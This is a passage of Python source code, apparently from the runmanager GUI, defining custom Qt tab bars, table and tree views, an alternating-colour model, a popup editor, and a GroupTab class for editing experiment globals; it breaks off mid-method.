reply = QtWidgets.QMessageBox.question(app.ui, 'runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
@contextlib.contextmanager
def nested(*contextmanagers):
if contextmanagers:
with contextmanagers[0]:
with nested(*contextmanagers[1:]):
yield
else:
yield
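# Illustrative usage (added for clarity; cm1 and cm2 are hypothetical context
# managers): nested() enters any number of context managers, equivalent to
# stacking `with` blocks:
#
#     with nested(cm1, cm2):
#         ...  # both are active here, and are exited in reverse order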
def scroll_view_to_row_if_current(view, item):
"""Checks to see if the item is in the row of the current item. If it is, scrolls
the treeview/tableview vertically to ensure that row is visible. This is done by
recording the horizontal scroll position, then using view.scrollTo(), and then
restoring the horizontal position"""
horizontal_scrollbar = view.horizontalScrollBar()
existing_horizontal_position = horizontal_scrollbar.value()
index = item.index()
current_row = view.currentIndex().row()
if index.row() == current_row:
view.scrollTo(index)
horizontal_scrollbar.setValue(existing_horizontal_position)
class FingerTabBarWidget(QtWidgets.QTabBar):
"""A TabBar with the tabs on the left and the text horizontal. Credit to
@LegoStormtroopr, https://gist.github.com/LegoStormtroopr/5075267. We will
promote the TabBar from the ui file to one of these."""
def __init__(self, parent=None, minwidth=180, minheight=30, **kwargs):
QtWidgets.QTabBar.__init__(self, parent, **kwargs)
self.minwidth = minwidth
self.minheight = minheight
self.iconPosition = kwargs.pop('iconPosition', QtWidgets.QTabWidget.West)
self._movable = None
self.tab_movable = {}
self.paint_clip = None
def setMovable(self, movable, index=None):
"""Set tabs movable on an individual basis, or set for all tabs if no
index specified"""
if index is None:
self._movable = movable
self.tab_movable = {}
QtWidgets.QTabBar.setMovable(self, movable)
else:
self.tab_movable[int(index)] = bool(movable)
def isMovable(self, index=None):
if index is None:
if self._movable is None:
self._movable = QtWidgets.QTabBar.isMovable(self)
return self._movable
return self.tab_movable.get(index, self._movable)
def indexAtPos(self, point):
for index in range(self.count()):
if self.tabRect(index).contains(point):
return index
def mousePressEvent(self, event):
index = self.indexAtPos(event.pos())
if not self.tab_movable.get(index, self.isMovable()):
QtWidgets.QTabBar.setMovable(self, False) # disable dragging until they release the mouse
return QtWidgets.QTabBar.mousePressEvent(self, event)
def mouseReleaseEvent(self, event):
if self.isMovable():
# Restore this in case it was temporarily disabled by mousePressEvent
QtWidgets.QTabBar.setMovable(self, True)
return QtWidgets.QTabBar.mouseReleaseEvent(self, event)
def tabLayoutChange(self):
total_height = 0
for index in range(self.count()):
tabRect = self.tabRect(index)
total_height += tabRect.height()
if total_height > self.parent().height():
# Don't paint over the top of the scroll buttons:
scroll_buttons_area_height = 2*max(self.style().pixelMetric(QtWidgets.QStyle.PM_TabBarScrollButtonWidth),
qapplication.globalStrut().width())
self.paint_clip = self.width(), self.parent().height() - scroll_buttons_area_height
else:
self.paint_clip = None
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
if self.paint_clip is not None:
painter.setClipRect(0, 0, *self.paint_clip)
option = QtWidgets.QStyleOptionTab()
for index in range(self.count()):
tabRect = self.tabRect(index)
self.initStyleOption(option, index)
painter.drawControl(QtWidgets.QStyle.CE_TabBarTabShape, option)
if not self.tabIcon(index).isNull():
icon = self.tabIcon(index).pixmap(self.iconSize())
alignment = QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter
tabRect.moveLeft(10)
painter.drawItemPixmap(tabRect, alignment, icon)
tabRect.moveLeft(self.iconSize().width() + 15)
else:
tabRect.moveLeft(10)
painter.drawText(tabRect, QtCore.Qt.AlignVCenter, self.tabText(index))
if self.paint_clip is not None:
x_clip, y_clip = self.paint_clip
painter.setClipping(False)
palette = self.palette()
mid_color = palette.color(QtGui.QPalette.Mid)
painter.setPen(mid_color)
painter.drawLine(0, y_clip, x_clip, y_clip)
painter.end()
def tabSizeHint(self, index):
fontmetrics = QtGui.QFontMetrics(self.font())
text_width = fontmetrics.width(self.tabText(index))
text_height = fontmetrics.height()
height = text_height + 15
height = max(self.minheight, height)
width = text_width + 15
button = self.tabButton(index, QtWidgets.QTabBar.RightSide)
if button is not None:
height = max(height, button.height() + 7)
# Same amount of space around the button horizontally as it has vertically:
width += button.width() + height - button.height()
width = max(self.minwidth, width)
return QtCore.QSize(width, height)
def setTabButton(self, index, geometry, button):
if not isinstance(button, TabToolButton):
raise TypeError('Not a TabToolButton, won\'t paint correctly. Use a TabToolButton')
result = QtWidgets.QTabBar.setTabButton(self, index, geometry, button)
button.move(*button.get_correct_position())
return result
class TabToolButton(QtWidgets.QToolButton):
def __init__(self, *args, **kwargs):
QtWidgets.QToolButton.__init__(self, *args, **kwargs)
self.setFocusPolicy(QtCore.Qt.NoFocus)
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
paint_clip = self.parent().paint_clip
if paint_clip is not None:
point = QtCore.QPoint(*paint_clip)
global_point = self.parent().mapToGlobal(point)
local_point = self.mapFromGlobal(global_point)
painter.setClipRect(0, 0, local_point.x(), local_point.y())
option = QtWidgets.QStyleOptionToolButton()
self.initStyleOption(option)
painter.drawComplexControl(QtWidgets.QStyle.CC_ToolButton, option)
def get_correct_position(self):
parent = self.parent()
for index in range(parent.count()):
if parent.tabButton(index, QtWidgets.QTabBar.RightSide) is self:
break
else:
raise LookupError('Tab not found')
tabRect = parent.tabRect(index)
tab_x, tab_y, tab_width, tab_height = tabRect.x(), tabRect.y(), tabRect.width(), tabRect.height()
size = self.sizeHint()
width = size.width()
height = size.height()
padding = int((tab_height - height) / 2)
correct_x = tab_x + tab_width - width - padding
correct_y = tab_y + padding
return correct_x, correct_y
def moveEvent(self, event):
try:
correct_x, correct_y = self.get_correct_position()
except LookupError:
return # Things aren't initialised yet
if self.x() != correct_x or self.y() != correct_y:
# Move back! I shall not be moved!
self.move(correct_x, correct_y)
return QtWidgets.QToolButton.moveEvent(self, event)
class FingerTabWidget(QtWidgets.QTabWidget):
"""A QTabWidget equivalent which uses our FingerTabBarWidget"""
def __init__(self, parent, *args):
QtWidgets.QTabWidget.__init__(self, parent, *args)
self.setTabBar(FingerTabBarWidget(self))
def addTab(self, *args, **kwargs):
closeable = kwargs.pop('closable', False)
index = QtWidgets.QTabWidget.addTab(self, *args, **kwargs)
self.setTabClosable(index, closeable)
return index
def setTabClosable(self, index, closable):
right_button = self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide)
if closable:
if not right_button:
# Make one:
close_button = TabToolButton(self.parent())
close_button.setIcon(QtGui.QIcon(':/qtutils/fugue/cross'))
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, close_button)
close_button.clicked.connect(lambda: self._on_close_button_clicked(close_button))
else:
if right_button:
# Get rid of it:
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, None)
def _on_close_button_clicked(self, button):
for index in range(self.tabBar().count()):
if self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide) is button:
self.tabCloseRequested.emit(index)
break
class ItemView(object):
"""Mixin for QTableView and QTreeView that emits a custom signal leftClicked(index)
after a left click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Also has modified tab and arrow key behaviour and custom selection
highlighting."""
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
COLOR_HIGHLIGHT = "#40308CC6" # Semitransparent blue
def __init__(self, *args):
super(ItemView, self).__init__(*args)
self._pressed_index = None
self._double_click = False
self.setAutoScroll(False)
p = self.palette()
for group in [QtGui.QPalette.Active, QtGui.QPalette.Inactive]:
p.setColor(
group,
QtGui.QPalette.Highlight,
QtGui.QColor(self.COLOR_HIGHLIGHT))
p.setColor(
group,
QtGui.QPalette.HighlightedText,
p.color(QtGui.QPalette.Active, QtGui.QPalette.Foreground)
)
self.setPalette(p)
def mousePressEvent(self, event):
result = super(ItemView, self).mousePressEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = super(ItemView, self).leaveEvent(event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = super(ItemView, self).mouseDoubleClickEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = super(ItemView, self).mouseReleaseEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
def keyPressEvent(self, event):
if event.key() in [QtCore.Qt.Key_Space, QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
item = self.model().itemFromIndex(self.currentIndex())
if item.isEditable():
# Space/enter edits editable items:
self.edit(self.currentIndex())
else:
# Space/enter on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return super(ItemView, self).keyPressEvent(event)
def moveCursor(self, cursor_action, keyboard_modifiers):
current_index = self.currentIndex()
current_row, current_column = current_index.row(), current_index.column()
if cursor_action == QtWidgets.QAbstractItemView.MoveUp:
return current_index.sibling(current_row - 1, current_column)
elif cursor_action == QtWidgets.QAbstractItemView.MoveDown:
return current_index.sibling(current_row + 1, current_column)
elif cursor_action == QtWidgets.QAbstractItemView.MoveLeft:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QAbstractItemView.MoveRight:
return current_index.sibling(current_row, current_column + 1)
elif cursor_action == QtWidgets.QAbstractItemView.MovePrevious:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QAbstractItemView.MoveNext:
return current_index.sibling(current_row, current_column + 1)
else:
return super(ItemView, self).moveCursor(cursor_action, keyboard_modifiers)
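# Note (added for clarity): MoveNext/MovePrevious correspond to Tab/Shift-Tab,
# so with the overrides above Tab moves one cell sideways within the current
# row, just like the left/right arrow keys, rather than using the default
# item-view traversal.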
class TreeView(ItemView, QtWidgets.QTreeView):
"""Treeview version of our customised ItemView"""
def __init__(self, parent=None):
super(TreeView, self).__init__(parent)
# Set columns to their minimum size, disabling resizing. Caller may still
# configure a specific section to stretch:
self.header().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.setItemDelegate(ItemDelegate(self))
class TableView(ItemView, QtWidgets.QTableView):
"""TableView version of our customised ItemView"""
def __init__(self, parent=None):
super(TableView, self).__init__(parent)
# Set rows and columns to the minimum size, disabling interactive resizing.
# Caller may still configure a specific column to stretch:
self.verticalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.horizontalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.horizontalHeader().sectionResized.connect(self.on_column_resized)
self.setItemDelegate(ItemDelegate(self))
self.verticalHeader().hide()
self.setShowGrid(False)
self.horizontalHeader().setHighlightSections(False)
def on_column_resized(self, col):
for row in range(self.model().rowCount()):
self.resizeRowToContents(row)
class AlternatingColorModel(QtGui.QStandardItemModel):
def __init__(self, view):
QtGui.QStandardItemModel.__init__(self)
# How much darker in each channel is the alternate base color compared
# to the base color?
self.view = view
palette = view.palette()
self.normal_color = palette.color(QtGui.QPalette.Base)
self.alternate_color = palette.color(QtGui.QPalette.AlternateBase)
r, g, b, a = self.normal_color.getRgb()
alt_r, alt_g, alt_b, alt_a = self.alternate_color.getRgb()
self.delta_r = alt_r - r
self.delta_g = alt_g - g
self.delta_b = alt_b - b
self.delta_a = alt_a - a
# A cache: store brushes so we don't have to recalculate them, which is faster.
self.bg_brushes = {}
def get_bgbrush(self, normal_brush, alternate, selected):
"""Get cell colour as a function of its ordinary colour, whether it is on an odd
row, and whether it is selected."""
normal_rgb = normal_brush.color().getRgb() if normal_brush is not None else None
try:
return self.bg_brushes[normal_rgb, alternate, selected]
except KeyError:
pass
# Get the colour of the cell with alternate row shading:
if normal_rgb is None:
# No colour has been set. Use palette colours:
if alternate:
bg_color = self.alternate_color
else:
bg_color = self.normal_color
else:
bg_color = normal_brush.color()
if alternate:
# Modify alternate rows:
r, g, b, a = normal_rgb
alt_r = min(max(r + self.delta_r, 0), 255)
alt_g = min(max(g + self.delta_g, 0), 255)
alt_b = min(max(b + self.delta_b, 0), 255)
alt_a = min(max(a + self.delta_a, 0), 255)
bg_color = QtGui.QColor(alt_r, alt_g, alt_b, alt_a)
# If parent is a TableView, we handle selection highlighting as part of the
# background colours:
if selected and isinstance(self.view, QtWidgets.QTableView):
# Overlay highlight colour:
r_s, g_s, b_s, a_s = QtGui.QColor(ItemView.COLOR_HIGHLIGHT).getRgb()
r_0, g_0, b_0, a_0 = bg_color.getRgb()
rgb = composite_colors(r_0, g_0, b_0, a_0, r_s, g_s, b_s, a_s)
bg_color = QtGui.QColor(*rgb)
brush = QtGui.QBrush(bg_color)
self.bg_brushes[normal_rgb, alternate, selected] = brush
return brush
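# Note (added for clarity): the cache above is keyed on
# (normal RGBA tuple, alternate-row flag, selected flag), so each distinct
# combination has its composite brush computed only once.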
def data(self, index, role):
"""When background color data is being requested, returns modified colours for
every second row, according to the palette of the view. This has the effect of
making the alternate colours visible even when custom colors have been set - the
same shading will be applied to the custom colours. Only really looks sensible
when the normal and alternate colors are similar. Also applies selection
highlight colour (using ItemView.COLOR_HIGHLIGHT), similarly with alternate-row
shading, for the case of a QTableView."""
if role == QtCore.Qt.BackgroundRole:
normal_brush = QtGui.QStandardItemModel.data(self, index, QtCore.Qt.BackgroundRole)
selected = index in self.view.selectedIndexes()
alternate = index.row() % 2
return self.get_bgbrush(normal_brush, alternate, selected)
return QtGui.QStandardItemModel.data(self, index, role)
class Editor(QtWidgets.QTextEdit):
"""Popup editor with word wrapping and automatic resizing."""
def __init__(self, parent):
QtWidgets.QTextEdit.__init__(self, parent)
self.setWordWrapMode(QtGui.QTextOption.WordWrap)
self.setAcceptRichText(False)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textChanged.connect(self.update_size)
self.initial_height = None
def update_size(self):
if self.initial_height is not None:
# Temporarily shrink back to the initial height, just so that the document
# size below returns the preferred size rather than the current size.
# QTextDocument doesn't have a sizeHint or minimumSizeHint method, so this
# is the best we can do to get its minimum size.
self.setFixedHeight(self.initial_height)
preferred_height = self.document().size().toSize().height()
# Do not shrink smaller than the initial height:
if self.initial_height is not None and preferred_height >= self.initial_height:
self.setFixedHeight(preferred_height)
def resizeEvent(self, event):
result = QtWidgets.QTextEdit.resizeEvent(self, event)
# Record the initial height after it is first set:
if self.initial_height is None:
self.initial_height = self.height()
return result
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a larger row height and column width, faint grey vertical
lines between columns, and a custom editor for handling multi-line data"""
MIN_ROW_HEIGHT = 22
EXTRA_ROW_HEIGHT = 6
EXTRA_COL_WIDTH = 20
def __init__(self, *args, **kwargs):
QtWidgets.QStyledItemDelegate.__init__(self, *args, **kwargs)
self._pen = QtGui.QPen()
self._pen.setWidth(1)
self._pen.setColor(QtGui.QColor.fromRgb(128, 128, 128, 64))
def sizeHint(self, *args):
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
if size.height() <= self.MIN_ROW_HEIGHT:
height = self.MIN_ROW_HEIGHT
else:
# Ensure cells with multiple lines of text still have some padding:
height = size.height() + self.EXTRA_ROW_HEIGHT
return QtCore.QSize(size.width() + self.EXTRA_COL_WIDTH, height)
def paint(self, painter, option, index):
if isinstance(self.parent(), QtWidgets.QTableView):
# Disable rendering of selection highlight for TableViews, they handle
# it themselves with the background colour data:
option.state &= ~(QtWidgets.QStyle.State_Selected)
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
if index.column() > 0:
painter.setPen(self._pen)
painter.drawLine(option.rect.topLeft(), option.rect.bottomLeft())
def eventFilter(self, obj, event):
"""Filter events before they get to the editor, so that editing is ended when
the user presses tab, shift-tab or enter (which otherwise would not end editing
in a QTextEdit)."""
if event.type() == QtCore.QEvent.KeyPress:
if event.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
# Allow shift-enter
if not event.modifiers() & QtCore.Qt.ShiftModifier:
self.commitData.emit(obj)
self.closeEditor.emit(obj)
return True
elif event.key() == QtCore.Qt.Key_Tab:
self.commitData.emit(obj)
self.closeEditor.emit(obj, QtWidgets.QStyledItemDelegate.EditNextItem)
return True
elif event.key() == QtCore.Qt.Key_Backtab:
self.commitData.emit(obj)
self.closeEditor.emit(obj, QtWidgets.QStyledItemDelegate.EditPreviousItem)
return True
return QtWidgets.QStyledItemDelegate.eventFilter(self, obj, event)
def createEditor(self, parent, option, index):
return Editor(parent)
def setEditorData(self, editor, index):
editor.setPlainText(index.data())
font = index.data(QtCore.Qt.FontRole)
default_font = qapplication.font(self.parent())
if font is None:
font = default_font
font.setPointSize(default_font.pointSize())
editor.setFont(font)
font_height = QtGui.QFontMetrics(font).height()
padding = (self.MIN_ROW_HEIGHT - font_height) / 2 - 1
editor.document().setDocumentMargin(padding)
editor.selectAll()
def setModelData(self, editor, model, index):
model.setData(index, editor.toPlainText())
class GroupTab(object):
GLOBALS_COL_DELETE = 0
GLOBALS_COL_NAME = 1
GLOBALS_COL_VALUE = 2
GLOBALS_COL_UNITS = 3
GLOBALS_COL_EXPANSION = 4
GLOBALS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GLOBALS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 2
GLOBALS_ROLE_PREVIOUS_TEXT = QtCore.Qt.UserRole + 3
GLOBALS_ROLE_IS_BOOL = QtCore.Qt.UserRole + 4
COLOR_ERROR = '#F79494' # light red
COLOR_OK = '#A5F7C6' # light green
COLOR_BOOL_ON = '#63F731' # bright green
COLOR_BOOL_OFF = '#608060' # dark green
GLOBALS_DUMMY_ROW_TEXT = '<Click to add global>'
def __init__(self, tabWidget, globals_file, group_name):
self.tabWidget = tabWidget
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load('group.ui')
# Add the ui to the parent tabWidget:
self.tabWidget.addTab(self.ui, group_name, closable=True)
self.set_file_and_group_name(globals_file, group_name)
self.globals_model = AlternatingColorModel(view=self.ui.tableView_globals)
self.globals_model.setHorizontalHeaderLabels(['Delete', 'Name', 'Value', 'Units', 'Expansion'])
self.globals_model.setSortRole(self.GLOBALS_ROLE_SORT_DATA)
self.ui.tableView_globals.setModel(self.globals_model)
self.ui.tableView_globals.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self.ui.tableView_globals.setSelectionMode(QtWidgets.QTableView.ExtendedSelection)
self.ui.tableView_globals.setSortingEnabled(True)
# Make it so the user can just start typing on an item to edit:
self.ui.tableView_globals.setEditTriggers(QtWidgets.QTableView.AnyKeyPressed |
QtWidgets.QTableView.EditKeyPressed)
# Ensure the clickable region of the delete button doesn't extend forever:
self.ui.tableView_globals.horizontalHeader().setStretchLastSection(False)
# Stretch the value column to fill available space:
self.ui.tableView_globals.horizontalHeader().setSectionResizeMode(
self.GLOBALS_COL_VALUE, QtWidgets.QHeaderView.Stretch
)
# Setup stuff for a custom context menu:
self.ui.tableView_globals.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_globals_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected global(s)', self.ui)
self.action_globals_set_selected_true = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected Booleans True', self.ui)
self.action_globals_set_selected_false = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected Booleans False', self.ui)
self.connect_signals()
# Populate the model with globals from the h5 file:
self.populate_model()
# Set sensible column widths:
for col in range(self.globals_model.columnCount()):
if col != self.GLOBALS_COL_VALUE:
self.ui.tableView_globals.resizeColumnToContents(col)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_NAME) < 200:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_NAME, 200)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_VALUE) < 200:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_VALUE, 200)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_UNITS) < 100:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_UNITS, 100)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_EXPANSION) < 100:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_EXPANSION, 100)
self.ui.tableView_globals.resizeColumnToContents(self.GLOBALS_COL_DELETE)
# Error state of tab
self.tab_contains_errors = False
def connect_signals(self):
self.ui.tableView_globals.leftClicked.connect(self.on_tableView_globals_leftClicked)
self.ui.tableView_globals.customContextMenuRequested.connect(self.on_tableView_globals_context_menu_requested)
self.action_globals_set_selected_true.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('True'))
self.action_globals_set_selected_false.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('False'))
self.action_globals_delete_selected.triggered.connect(self.on_globals_delete_selected_triggered)
self.globals_model.itemChanged.connect(self.on_globals_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.globals_model_item_changed_disconnected = DisconnectContextManager(
self.globals_model.itemChanged, self.on_globals_model_item_changed)
def set_file_and_group_name(self, globals_file, group_name):
"""Provided as a separate method so the main app can call it if the
group gets renamed"""
self.globals_file = globals_file
self.group_name = group_name
self.ui.label_globals_file.setText(globals_file)
self.ui.label_group_name.setText(group_name)
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.setTabText(index, group_name)
self.tabWidget.setTabToolTip(index, '%s\n(%s)' % (group_name, globals_file))
def set_tab_icon(self, icon_string):
index = self.tabWidget.indexOf(self.ui)
if icon_string is not None:
icon = QtGui.QIcon(icon_string)
else:
icon = QtGui.QIcon()
if self.tabWidget.tabIcon(index).cacheKey() != icon.cacheKey():
logger.info('setting tab icon')
self.tabWidget.setTabIcon(index, icon)
def populate_model(self):
globals = runmanager.get_globals({self.group_name: self.globals_file})[self.group_name]
for name, (value, units, expansion) in globals.items():
row = self.make_global_row(name, value, units, expansion)
self.globals_model.appendRow(row)
value_item = row[self.GLOBALS_COL_VALUE]
self.check_for_boolean_values(value_item)
expansion_item = row[self.GLOBALS_COL_EXPANSION]
self.on_globals_model_expansion_changed(expansion_item)
# Add the dummy item at the end:
dummy_delete_item = QtGui.QStandardItem()
# This lets later code know that this row does not correspond to an
# actual global:
dummy_delete_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item.setToolTip('Click to add global')
dummy_name_item = QtGui.QStandardItem(self.GLOBALS_DUMMY_ROW_TEXT)
dummy_name_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
dummy_name_item.setToolTip('Click to add global')
dummy_name_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GLOBALS_DUMMY_ROW_TEXT, self.GLOBALS_ROLE_PREVIOUS_TEXT)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_value_item = QtGui.QStandardItem()
dummy_value_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_value_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_value_item.setToolTip('Click to add global')
dummy_units_item = QtGui.QStandardItem()
dummy_units_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_units_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_units_item.setToolTip('Click to add global')
dummy_expansion_item = QtGui.QStandardItem()
dummy_expansion_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_expansion_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_expansion_item.setToolTip('Click to add global')
self.globals_model.appendRow(
[dummy_delete_item, dummy_name_item, dummy_value_item, dummy_units_item, dummy_expansion_item])
# Sort by name:
self.ui.tableView_globals.sortByColumn(self.GLOBALS_COL_NAME, QtCore.Qt.AscendingOrder)
def make_global_row(self, name, value='', units='', expansion=''):
logger.debug('%s:%s - make global row: %s ' % (self.globals_file, self.group_name, name))
# We just set some data here, other stuff is set in
# self.update_parse_indication after runmanager has a chance to parse
# everything and get back to us about what that data should be.
delete_item = QtGui.QStandardItem()
delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
delete_item.setData(False, self.GLOBALS_ROLE_SORT_DATA)
delete_item.setEditable(False)
delete_item.setToolTip('Delete global from group.')
name_item = QtGui.QStandardItem(name)
name_item.setData(name, self.GLOBALS_ROLE_SORT_DATA)
name_item.setData(name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_item.setToolTip(name)
name_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
value_item = QtGui.QStandardItem(value)
value_item.setData(value, self.GLOBALS_ROLE_SORT_DATA)
value_item.setData(str(value), self.GLOBALS_ROLE_PREVIOUS_TEXT)
value_item.setToolTip('Evaluating...')
value_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
units_item = QtGui.QStandardItem(units)
units_item.setData(units, self.GLOBALS_ROLE_SORT_DATA)
units_item.setData(units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setToolTip('')
expansion_item = QtGui.QStandardItem(expansion)
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
expansion_item.setToolTip('')
row = [delete_item, name_item, value_item, units_item, expansion_item]
return row
def on_tableView_globals_leftClicked(self, index):
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.globals_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new global' row. Enter editing mode on
# the name item so they can enter a name for the new global:
self.ui.tableView_globals.setCurrentIndex(name_index)
self.ui.tableView_globals.edit(name_index)
elif item.data(self.GLOBALS_ROLE_IS_BOOL):
# It's a bool indicator. Toggle it
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
value_item.setText('False')
elif value_item.text() == 'False':
value_item.setText('True')
else:
raise AssertionError('expected boolean value')
elif item.column() == self.GLOBALS_COL_DELETE:
# They clicked a delete button.
self.delete_global(global_name)
elif not item.data(self.GLOBALS_ROLE_IS_BOOL):
# Edit whatever it is:
if (self.ui.tableView_globals.currentIndex() != index
or self.ui.tableView_globals.state() != QtWidgets.QTreeView.EditingState):
self.ui.tableView_globals.setCurrentIndex(index)
self.ui.tableView_globals.edit(index)
def on_globals_model_item_changed(self, item):
if item.column() == self.GLOBALS_COL_NAME:
self.on_globals_model_name_changed(item)
elif item.column() == self.GLOBALS_COL_VALUE:
self.on_globals_model_value_changed(item)
elif item.column() == self.GLOBALS_COL_UNITS:
self.on_globals_model_units_changed(item)
elif item.column() == self.GLOBALS_COL_EXPANSION:
self.on_globals_model_expansion_changed(item)
def on_globals_model_name_changed(self, item):
"""Handles global renaming and creation of new globals due to the user
editing the <click to add global> item"""
item_text = item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
if item_text != self.GLOBALS_DUMMY_ROW_TEXT:
# The user has made a new global by editing the <click to add
# global> item
global_name = item_text
self.new_global(global_name)
else:
# User has renamed a global.
new_global_name = item_text
previous_global_name = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
# Ensure the name actually changed, rather than something else
# about the item:
if new_global_name != previous_global_name:
self.rename_global(previous_global_name, new_global_name)
def on_globals_model_value_changed(self, item):
index = item.index()
new_value = item.text()
previous_value = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Ensure the value actually changed, rather than something else about
# the item:
if new_value != previous_value:
self.change_global_value(global_name, previous_value, new_value)
def on_globals_model_units_changed(self, item):
index = item.index()
new_units = item.text()
previous_units = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# If it's a boolean value, ensure the check state matches the bool state:
if item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
item.setCheckState(QtCore.Qt.Checked)
elif value_item.text() == 'False':
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('expected boolean value')
# Ensure the value actually changed, rather than something else about
# the item:
if new_units != previous_units:
self.change_global_units(global_name, previous_units, new_units)
def on_globals_model_expansion_changed(self, item):
index = item.index()
new_expansion = item.text()
previous_expansion = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Don't want icon changing to recurse - which happens even if it is
# the same icon. So disconnect the signal temporarily:
with self.globals_model_item_changed_disconnected:
if new_expansion == 'outer':
